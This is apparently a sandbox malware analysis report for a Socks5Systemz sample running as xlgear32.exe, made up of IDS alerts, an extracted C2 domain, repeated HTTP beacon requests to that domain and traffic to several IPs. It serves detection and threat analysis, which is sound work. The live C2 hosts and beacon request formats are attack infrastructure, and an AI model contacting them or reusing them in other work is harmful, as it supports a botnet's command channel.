                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49803 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49803 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49901 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49901 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49905 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49905 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49920 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49923 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49923 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49910 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49915 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49915 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49920 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49839 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49839 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49910 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49783 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49783 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49790 -> 185.208.158.202:80
                    Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49790 -> 185.208.158.202:80
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: ayeyoji.ru
                    Source: global trafficTCP traffic: 192.168.2.4:49737 -> 89.105.201.183:2023
                    Source: Joe Sandbox ViewIP Address: 185.208.158.202 185.208.158.202
                    Source: Joe Sandbox ViewIP Address: 89.105.201.183 89.105.201.183
                    Source: Joe Sandbox ViewASN Name: SIMPLECARRER2IT SIMPLECARRER2IT
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c445db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfd18c3ef919933 HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c445db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfd18c3ef919933 HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                    Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
                    Source: unknownUDP traffic detected without corresponding DNS query: 141.98.234.31
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_02D972AB Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_strtok,_swscanf,_strtok,_free,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_free,4_2_02D972AB
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c445db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfd18c3ef919933 HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c445db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfd18c3ef919933 HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                    Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec979338cd6b951e HTTP/1.1Host: ayeyoji.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
